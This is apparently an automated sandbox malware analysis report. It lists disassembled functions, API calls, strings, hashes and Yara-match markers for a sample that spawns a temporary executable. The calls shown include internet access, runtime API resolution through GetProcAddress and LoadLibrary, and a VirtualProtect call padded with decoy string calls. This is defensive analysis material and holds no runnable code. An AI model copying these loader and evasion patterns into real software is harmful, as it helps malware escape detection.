API String ID: 3213639722-2276729525
Opcode ID: cb57d0990ecd4e157a276670056fa63ecf5c6ef3cb6d4436f05d56c4fa4236c6
Instruction ID: 9c0c3c151ae2a5a6b50f0fee57114a4457493f87fddc68121f24b850b116d2d7
Opcode Fuzzy Hash: cb57d0990ecd4e157a276670056fa63ecf5c6ef3cb6d4436f05d56c4fa4236c6
Instruction Fuzzy Hash: 8C515D61B04302D6DB117714E90137BABA0EB54B40FE4597FF491813E9EE3D8CAA9A4F

Function 0043AE69 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 88COMMONLIBRARYCODE

Download Yara Rule

APIs

GetACP.KERNEL32(?,20001004,?,00000002,00000000,00000050,00000050,?,0043B0C4,?,00000050,?,?,?,?,?), ref: 0043AF44

Strings

OCP, xrefs: 0043AEBD
ACP, xrefs: 0043AE87

Memory Dump Source

Source File: 00000000.00000002.4093219448.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_SEejSLAS9f.jbxd

Similarity

API ID:
String ID: ACP$OCP
API String ID: 0-711371036
Opcode ID: 3d3d09a8c43a337bc5f8b6bf8185eed6c30071c5532ceeb821c98544ef4eef7c
Instruction ID: 14488b359d73a2b35151aaad325e7c1d9f20b01c06d3923b8e2598dc1437a59e
Opcode Fuzzy Hash: 3d3d09a8c43a337bc5f8b6bf8185eed6c30071c5532ceeb821c98544ef4eef7c
Instruction Fuzzy Hash: F3212BA2AC4101A6DB30CB54C907B977366EF5CB11F569526E98AC7300F73ADD11C39E

Function 024AB0D0 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 88COMMONLIBRARYCODE

Download Yara Rule

APIs

GetACP.KERNEL32(?,20001004,?,00000002,00000000,00000050,00000050,?,024AB32B,?,00000050,?,?,?,?,?), ref: 024AB1AB

Strings

ACP, xrefs: 024AB0EE
OCP, xrefs: 024AB124

Memory Dump Source

Source File: 00000000.00000002.4093665452.0000000002470000.00000040.00001000.00020000.00000000.sdmp, Offset: 02470000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2470000_SEejSLAS9f.jbxd

Yara matches

Similarity

API ID:
String ID: ACP$OCP
API String ID: 0-711371036
Opcode ID: 3d3d09a8c43a337bc5f8b6bf8185eed6c30071c5532ceeb821c98544ef4eef7c
Instruction ID: d996299ac57833f46d975cbf63b7a7074f7d35f5bbe6985b5cbf979b0331125b
Opcode Fuzzy Hash: 3d3d09a8c43a337bc5f8b6bf8185eed6c30071c5532ceeb821c98544ef4eef7c
Instruction Fuzzy Hash: DD21B372B00105A6EB268F649D61BA7739AEF74BDCF4A8126E909DB304F732D941C390

Function 00401F0A Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 63COMMON

Download Yara Rule

APIs

GdipGetImageEncodersSize.GDIPLUS(?,?), ref: 00401F25
GdipGetImageEncoders.GDIPLUS(?,?,00000000), ref: 00401F4A

Strings

image/png, xrefs: 00401F58

Memory Dump Source

Source File: 00000000.00000002.4093219448.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_SEejSLAS9f.jbxd

Similarity

API ID: EncodersGdipImage$Size
String ID: image/png
API String ID: 864223233-2966254431
Opcode ID: a4116aea5856e167c2c377b93ae464baf6efd33a5122bb5b4e0eea2d33bbdf28
Instruction ID: a861e299a60b9ced5094bb1731eec5177a5b987cbaa8a1425c649574426e8627
Opcode Fuzzy Hash: a4116aea5856e167c2c377b93ae464baf6efd33a5122bb5b4e0eea2d33bbdf28
Instruction Fuzzy Hash: 04119476D00109FFCB01AFA99C8149EBB76FE41321B60027BE810B21E0C7755F419A58

Function 0040EF26 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 58COMMON

Download Yara Rule

APIs

SetLastError.KERNEL32(0000000D,?,0040DE41,0040C659,?,?,00000000,?,0040C529,0045D5E4,0040C4F6,0045D5DC,?,ios_base::failbit set,0040C659), ref: 0040EFAA

Strings

F(@, xrefs: 0040EF29

Memory Dump Source

Source File: 00000000.00000002.4093219448.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_SEejSLAS9f.jbxd

Similarity

API ID: ErrorLast
String ID: F(@
API String ID: 1452528299-2698495834
Opcode ID: 28a02ce365c990727b7b4e8bf51613b6bc71088fada4a4c5b2d2716d252c928d
Instruction ID: 02fe8a739a07683bc60ca74788e4bb9a0325118a5e4d2b20450d6bc28493fa7e
Opcode Fuzzy Hash: 28a02ce365c990727b7b4e8bf51613b6bc71088fada4a4c5b2d2716d252c928d
Instruction Fuzzy Hash: 2B11C236300216BFCF165F66DD4496AB765BB08B11B11483AFA05A6290CA7498219BD9

Function 0040C510 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 39COMMON

Download Yara Rule

APIs

___std_exception_destroy.LIBVCRUNTIME ref: 0040C554

Strings

F(@, xrefs: 0040C547
ios_base::failbit set, xrefs: 0040C510

Memory Dump Source

Source File: 00000000.00000002.4093219448.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_SEejSLAS9f.jbxd

Similarity

API ID: ___std_exception_destroy
String ID: F(@$ios_base::failbit set
API String ID: 4194217158-1828034088
Opcode ID: 326c062bbd77b351e70a003f48f611e5e8c7415ec1b2fbce5622d8111c151cd5
Instruction ID: 4ba2cac2fce41df0eb0aef52a6a00c17a8a4a8275336f9ee0f9be7dda5d805c6
Opcode Fuzzy Hash: 326c062bbd77b351e70a003f48f611e5e8c7415ec1b2fbce5622d8111c151cd5
Instruction Fuzzy Hash: 27F0B472A0022836D2302B56BC02B97F7CC8F50B69F14443FFE05A6681EBF8A94581EC

Function 0041DA0B Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 38COMMON

Download Yara Rule

APIs

std::invalid_argument::invalid_argument.LIBCONCRT ref: 0041DA53
__CxxThrowException@8.LIBVCRUNTIME ref: 0041DA61

Strings

pContext, xrefs: 0041DA4B

Memory Dump Source

Source File: 00000000.00000002.4093219448.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_SEejSLAS9f.jbxd

Similarity

API ID: Exception@8Throwstd::invalid_argument::invalid_argument
String ID: pContext
API String ID: 1687795959-2046700901
Opcode ID: 8b89fd2ebf5a6180650f95f800d5794784ed0f3246bc88bba9479147dd287627
Instruction ID: 9bb5f33597777ba4e98b1388dc571d1ac2d7347b1e1174399eb2bf06ad7e47b8
Opcode Fuzzy Hash: 8b89fd2ebf5a6180650f95f800d5794784ed0f3246bc88bba9479147dd287627
Instruction Fuzzy Hash: DDF05939B005155BCB04EB59DC45C6EF7A8AF85760310017BFD01E3342CBB8ED058698

Function 0044068A Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 34COMMONLIBRARYCODE

Download Yara Rule

APIs

__EH_prolog3_catch.LIBCMT ref: 00440691

Strings

RCC, xrefs: 004406C3
MOC, xrefs: 004406B4

Memory Dump Source

Source File: 00000000.00000002.4093219448.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_SEejSLAS9f.jbxd

Similarity

API ID: H_prolog3_catch
String ID: MOC$RCC
API String ID: 3886170330-2084237596
Opcode ID: 97e7bd69da2a212c52dfa9d68122ee8a36af56c02b3e00c92559e584b2ae2017
Instruction ID: e9e4e095770ca636dcca3efe7f5224ff47edcbfbbe98bab9d98b6a8866433d4c
Opcode Fuzzy Hash: 97e7bd69da2a212c52dfa9d68122ee8a36af56c02b3e00c92559e584b2ae2017
Instruction Fuzzy Hash: 81F0AF70600224CFDB22AF95D40159D3B60AF82748F8281A7F9009B262C73C6E14CFAE

Function 00404E07 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 28COMMON

Download Yara Rule

APIs

std::_Locinfo::_Locinfo.LIBCPMT ref: 00404E3C

Part of subcall function 0040BF5D: std::_Lockit::_Lockit.LIBCPMT ref: 0040BF71
Part of subcall function 0040BF5D: std::_Locinfo::_Locinfo_ctor.LIBCPMT ref: 0040BFAE

std::_Locinfo::~_Locinfo.LIBCPMT ref: 00404E50

Part of subcall function 0040C008: std::_Locinfo::_Locinfo_dtor.LIBCPMT ref: 0040C02F
Part of subcall function 0040C008: std::_Lockit::~_Lockit.LIBCPMT ref: 0040C0A0

Strings

F@, xrefs: 00404E48

Memory Dump Source

Source File: 00000000.00000002.4093219448.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_SEejSLAS9f.jbxd

Similarity

API ID: std::_$Locinfo::_$LocinfoLockit$Locinfo::~_Locinfo_ctorLocinfo_dtorLockit::_Lockit::~_
String ID: F@
API String ID: 2118720939-885931407
Opcode ID: ab390ea3e88c8ea055363ab8ec40643519a30a11bb7225da03181527fb8750d3
Instruction ID: 13870e84e441ff14f0459789a428ac9660f365acd1e629d5c6e8dadf1a096d8e
Opcode Fuzzy Hash: ab390ea3e88c8ea055363ab8ec40643519a30a11bb7225da03181527fb8750d3
Instruction Fuzzy Hash: 7CF034B2410205DAEB21AF50C412B9973B4BF80B15F61813FE545AB2C1DB786949CB89

Function 0042381B Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 18COMMON

Download Yara Rule

APIs

Concurrency::details::InternalContextBase::~InternalContextBase.LIBCONCRT ref: 0042382E

Strings

zB, xrefs: 00423821
~B, xrefs: 00423827

Memory Dump Source

Source File: 00000000.00000002.4093219448.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_SEejSLAS9f.jbxd

Similarity

API ID: ContextInternal$BaseBase::~Concurrency::details::
String ID: zB$~B
API String ID: 3275300208-395995950
Opcode ID: a1da6c89fa2dfd945bd02a2cb13c6e7ff4bb2a0d62993eedb0658c40d2c20ec7
Instruction ID: f55228a66ce0378ecda15d2e29e2cf9b619ecd1f8f2314d3bfe00ef4b4db5243
Opcode Fuzzy Hash: a1da6c89fa2dfd945bd02a2cb13c6e7ff4bb2a0d62993eedb0658c40d2c20ec7
Instruction Fuzzy Hash: 83D05B7124C32525E2256A4974057857AD84B01764F50803FF94456682CBB9654442DC

Function 004212BC Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 17COMMON

Download Yara Rule

APIs

std::invalid_argument::invalid_argument.LIBCONCRT ref: 004212DB
__CxxThrowException@8.LIBVCRUNTIME ref: 004212E9

Strings

pThreadProxy, xrefs: 004212D3

Memory Dump Source

Source File: 00000000.00000002.4093219448.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_SEejSLAS9f.jbxd

Similarity

API ID: Exception@8Throwstd::invalid_argument::invalid_argument
String ID: pThreadProxy
API String ID: 1687795959-3651400591
Opcode ID: a6860d66e6dfc760da51a725ddbc90d8fa67c7294f8bcc7dcd6806e1c2d97e2b
Instruction ID: be918fe35ab2875efcd6209978594ad56e839e7639c00e6f4a717d1a784130ad
Opcode Fuzzy Hash: a6860d66e6dfc760da51a725ddbc90d8fa67c7294f8bcc7dcd6806e1c2d97e2b
Instruction Fuzzy Hash: DED05B71E0020856D700E7B6D806F9F77A85B10708F50427B7D14E6186DB79E50886AC

Function 0042AE8A Relevance: 5.1, APIs: 4, Instructions: 139COMMONLIBRARYCODE

Download Yara Rule

APIs

MultiByteToWideChar.KERNEL32(?,00000009,00000000,00000000,?,00000000,00000000,00000000,00000000,?,?,00000000,00000000,00000000,F(@,00000000), ref: 0042AF20
GetLastError.KERNEL32 ref: 0042AF2E
MultiByteToWideChar.KERNEL32(?,00000001,?,?,?,00000000), ref: 0042AF89

Memory Dump Source

Source File: 00000000.00000002.4093219448.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_SEejSLAS9f.jbxd

Similarity

API ID: ByteCharMultiWide$ErrorLast
String ID:
API String ID: 1717984340-0
Opcode ID: 52d4a7004019297d44bc7c19dc2dfefffb9580c93fe43c28174d6fe013107c11
Instruction ID: 9270b5025f3a17d6db836abfdfc26bc83889a51b194ae21b206bd0a56260f073
Opcode Fuzzy Hash: 52d4a7004019297d44bc7c19dc2dfefffb9580c93fe43c28174d6fe013107c11
Instruction Fuzzy Hash: 5F410770700222AFCB219F65EA44BABBBB4EF01311F56416BFC5597291DB3C8D11C75A

Function 0249B0F1 Relevance: 5.1, APIs: 4, Instructions: 139COMMONLIBRARYCODE

Download Yara Rule

APIs

MultiByteToWideChar.KERNEL32(?,00000009,00000000,00000000,02472AAD,00000000,00000000,00000000,00000000,?,?,00000000,00000000,00000000,02472AAD,00000000), ref: 0249B187
GetLastError.KERNEL32 ref: 0249B195
MultiByteToWideChar.KERNEL32(?,00000001,?,?,02472AAD,00000000), ref: 0249B1F0

Memory Dump Source

Source File: 00000000.00000002.4093665452.0000000002470000.00000040.00001000.00020000.00000000.sdmp, Offset: 02470000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2470000_SEejSLAS9f.jbxd

Yara matches

Similarity

API ID: ByteCharMultiWide$ErrorLast
String ID:
API String ID: 1717984340-0
Opcode ID: e536570b9c15492d0518b6f8e8b2d6b0fefd1f832faf498bff9e3d376521cf30
Instruction ID: c066610513b409a7f41cbeb56effab23d5d1aa2c42a6952ac498485592969778
Opcode Fuzzy Hash: e536570b9c15492d0518b6f8e8b2d6b0fefd1f832faf498bff9e3d376521cf30
Instruction Fuzzy Hash: 8B41F631604216AFCF21CFA9EC48BBF7FA5EF41758F14416BE8599B2A0DB708901CB60

Analysis Process: 1D71.tmp.exePID: 7860, Parent PID: 7732COMMON

Execution Graph

Execution Coverage:	4.7%
Dynamic/Decrypted Code Coverage:	6.8%
Signature Coverage:	19.8%
Total number of Nodes:	1545
Total number of Limit Nodes:	37

Executed Functions

Function 00406000 Relevance: 123.3, APIs: 68, Strings: 2, Instructions: 817stringnetworkCOMMON

Download Yara Rule

APIs

lstrcpy.KERNEL32(00000000,?), ref: 0040602F
lstrcpy.KERNEL32(00000000,0042D01C), ref: 00406082
lstrcpy.KERNEL32(00000000,0042D01C), ref: 004060B5
lstrcpy.KERNEL32(00000000,0042D01C), ref: 004060E5
lstrcpy.KERNEL32(00000000,0042D01C), ref: 00406120
lstrcpy.KERNEL32(00000000,0042D01C), ref: 00406153
InternetOpenA.WININET(00000000,00000001,00000000,00000000,00000000), ref: 00406163

Strings

------, xrefs: 00406289, 004062B6, 0040652E, 0040661F
", xrefs: 004065C7, 004066B5

Memory Dump Source

Source File: 00000001.00000002.2241640249.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.2241640249.0000000000443000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000001.00000002.2241640249.000000000044B000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000001.00000002.2241640249.000000000046E000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000001.00000002.2241640249.0000000000471000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000001.00000002.2241640249.0000000000478000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000001.00000002.2241640249.00000000004B9000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000001.00000002.2241640249.000000000055B000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000001.00000002.2241640249.000000000055E000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000001.00000002.2241640249.0000000000596000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000001.00000002.2241640249.00000000005B9000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000001.00000002.2241640249.0000000000638000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000001.00000002.2241640249.000000000064A000.00000040.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_1D71.jbxd

Yara matches

Similarity

API ID: lstrcpy$InternetOpen
String ID: "$------
API String ID: 2041821634-2370822465
Opcode ID: 98aa613e604a5db2daeae4e8514d52f2f53726565d8e30286c0dd60e41fea8cd
Instruction ID: 2125bc0cde9220f82915efd50208f228c039266d2a321542d2fdd7d2ceb0accf
Opcode Fuzzy Hash: 98aa613e604a5db2daeae4e8514d52f2f53726565d8e30286c0dd60e41fea8cd
Instruction Fuzzy Hash: FE525E71A006159BDB20AFB5DD89B9F77B5AF04304F15503AF905B72E1DB78DC028BA8

Function 00404B80 Relevance: 111.1, APIs: 61, Strings: 2, Instructions: 807stringnetworkCOMMON

Download Yara Rule

APIs

lstrcpy.KERNEL32(00000000,?), ref: 00404BAF
lstrcpy.KERNEL32(00000000,0042D01C), ref: 00404C02
lstrcpy.KERNEL32(00000000,0042D01C), ref: 00404C35
lstrcpy.KERNEL32(00000000,0042D01C), ref: 00404C65
lstrcpy.KERNEL32(00000000,0042D01C), ref: 00404CA3
lstrcpy.KERNEL32(00000000,0042D01C), ref: 00404CD6
InternetOpenA.WININET(00000000,00000001,00000000,00000000,00000000), ref: 00404CE6

Strings

------, xrefs: 00404E0C, 00404E39, 004050BB, 004051AC
", xrefs: 00405154, 00405242

Memory Dump Source

Source File: 00000001.00000002.2241640249.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.2241640249.0000000000443000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000001.00000002.2241640249.000000000044B000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000001.00000002.2241640249.000000000046E000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000001.00000002.2241640249.0000000000471000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000001.00000002.2241640249.0000000000478000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000001.00000002.2241640249.00000000004B9000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000001.00000002.2241640249.000000000055B000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000001.00000002.2241640249.000000000055E000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000001.00000002.2241640249.0000000000596000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000001.00000002.2241640249.00000000005B9000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000001.00000002.2241640249.0000000000638000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000001.00000002.2241640249.000000000064A000.00000040.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_1D71.jbxd

Yara matches

Similarity

API ID: lstrcpy$InternetOpen
String ID: "$------
API String ID: 2041821634-2370822465
Opcode ID: 49ea093db890fc0322da265671638fee748496652ec839826222a43dfbee2ef2
Instruction ID: ee9b337c920fa440a166249251ede5a47d7364bfc35f9bc5310ef1df1bec01ed
Opcode Fuzzy Hash: 49ea093db890fc0322da265671638fee748496652ec839826222a43dfbee2ef2
Instruction Fuzzy Hash: C5526E71A006169BDB10AFA5DC49B9F7BB5AF44304F14503AF904B72A1DB78ED42CBE8

Function 00404980 Relevance: 61.4, APIs: 34, Strings: 1, Instructions: 115
stringmemorylibraryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

lstrlenA.KERNEL32(The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.), ref: 00404994
lstrlenA.KERNEL32(The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.), ref: 0040499B
lstrlenA.KERNEL32(The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.), ref: 004049A2
lstrlenA.KERNEL32(The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.), ref: 004049A9
lstrlenA.KERNEL32(The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.), ref: 004049B0
GetProcessHeap.KERNEL32(00000000,?), ref: 004049BB
RtlAllocateHeap.NTDLL(00000000), ref: 004049C2
lstrlenA.KERNEL32(The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.), ref: 004049D2
lstrlenA.KERNEL32(The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.), ref: 004049D9
lstrlenA.KERNEL32(The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.), ref: 004049E0
lstrlenA.KERNEL32(The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.), ref: 004049E7
lstrlenA.KERNEL32(The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.), ref: 004049EE
lstrlenA.KERNEL32(The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.), ref: 004049F9
lstrlenA.KERNEL32(The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.), ref: 00404A00
lstrlenA.KERNEL32(The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.), ref: 00404A07
lstrlenA.KERNEL32(The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.), ref: 00404A0E
lstrlenA.KERNEL32(The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.), ref: 00404A15
lstrlenA.KERNEL32(The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.), ref: 00404A2B
lstrlenA.KERNEL32(The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.), ref: 00404A32
lstrlenA.KERNEL32(The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.), ref: 00404A39
lstrlenA.KERNEL32(The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.), ref: 00404A40
lstrlenA.KERNEL32(The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.), ref: 00404A47
LdrInitializeThunk.NTDLL ref: 00404A4F
lstrlenA.KERNEL32(The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.), ref: 00404A73
lstrlenA.KERNEL32(The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.), ref: 00404A7A
lstrlenA.KERNEL32(The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.), ref: 00404A81
lstrlenA.KERNEL32(The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.), ref: 00404A88
lstrlenA.KERNEL32(The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.), ref: 00404A8F
lstrlenA.KERNEL32(The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.), ref: 00404A9F
lstrlenA.KERNEL32(The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.), ref: 00404AA6
lstrlenA.KERNEL32(The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.), ref: 00404AAD
lstrlenA.KERNEL32(The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.), ref: 00404AB4
lstrlenA.KERNEL32(The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.), ref: 00404ABB
VirtualProtect.KERNEL32(00000000,00000004,00000100,?), ref: 00404AD0

Strings

The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 0040498F, 00404996, 0040499D, 004049A4, 004049AB, 004049CA, 004049D4, 004049DB, 004049E2, 004049E9, 004049F0, 004049FB, 00404A02, 00404A09, 00404A10, 00404A26, 00404A2D, 00404A34, 00404A3B, 00404A42, 00404A63, 00404A75, 00404A7C, 00404A83, 00404A8A, 00404A9A, 00404AA1, 00404AA8, 00404AAF, 00404AB6

Memory Dump Source

Source File: 00000001.00000002.2241640249.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.2241640249.0000000000443000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000001.00000002.2241640249.000000000044B000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000001.00000002.2241640249.000000000046E000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000001.00000002.2241640249.0000000000471000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000001.00000002.2241640249.0000000000478000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000001.00000002.2241640249.00000000004B9000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000001.00000002.2241640249.000000000055B000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000001.00000002.2241640249.000000000055E000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000001.00000002.2241640249.0000000000596000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000001.00000002.2241640249.00000000005B9000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000001.00000002.2241640249.0000000000638000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000001.00000002.2241640249.000000000064A000.00000040.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_1D71.jbxd

Yara matches

Similarity

API ID: lstrlen$Heap$AllocateInitializeProcessProtectThunkVirtual
String ID: The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.
API String ID: 2971326882-3329630956
Opcode ID: d4fbde7a64d6b0f65250007a6e0b9dce90709805d16d9dfb35c6ab240d1eee8a
Instruction ID: 31bf12c2d79e338fb7f97826348345d32b3aa4c96b478bc01bd0f7d9a8ca19b4
Opcode Fuzzy Hash: d4fbde7a64d6b0f65250007a6e0b9dce90709805d16d9dfb35c6ab240d1eee8a
Instruction Fuzzy Hash: F531E920F4823C7F86206BA56C45BDFBED4DF8E750F389053F51855184C9A864058EE9

Function 004263C0 Relevance: 58.0, APIs: 32, Strings: 1, Instructions: 218
libraryloaderCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetProcAddress.KERNEL32(74DD0000,00A0B7B0), ref: 00426419
GetProcAddress.KERNEL32(74DD0000,00A0B810), ref: 00426432
GetProcAddress.KERNEL32(74DD0000,00A0B858), ref: 0042644A
GetProcAddress.KERNEL32(74DD0000,00A0B948), ref: 00426462
GetProcAddress.KERNEL32(74DD0000,009E65F8), ref: 0042647B
GetProcAddress.KERNEL32(74DD0000,009E48F0), ref: 00426493
GetProcAddress.KERNEL32(74DD0000,009E4B70), ref: 004264AB
GetProcAddress.KERNEL32(74DD0000,00A0B678), ref: 004264C4
GetProcAddress.KERNEL32(74DD0000,00A0B870), ref: 004264DC
GetProcAddress.KERNEL32(74DD0000,00A0B660), ref: 004264F4
GetProcAddress.KERNEL32(74DD0000,00A0B8E8), ref: 0042650D
GetProcAddress.KERNEL32(74DD0000,009E4950), ref: 00426525
GetProcAddress.KERNEL32(74DD0000,00A0B7C8), ref: 0042653D
GetProcAddress.KERNEL32(74DD0000,00A0B8A0), ref: 00426556
GetProcAddress.KERNEL32(74DD0000,009E4A90), ref: 0042656E
GetProcAddress.KERNEL32(74DD0000,00A0B6A8), ref: 00426586
GetProcAddress.KERNEL32(74DD0000,00A0B888), ref: 0042659F
GetProcAddress.KERNEL32(74DD0000,009E4AF0), ref: 004265B7
GetProcAddress.KERNEL32(74DD0000,00A0B8D0), ref: 004265CF
GetProcAddress.KERNEL32(74DD0000,009E4B90), ref: 004265E8
LoadLibraryA.KERNEL32(00A0B708,?,?,?,00421BE3), ref: 004265F9
LoadLibraryA.KERNEL32(00A0B930,?,?,?,00421BE3), ref: 0042660B
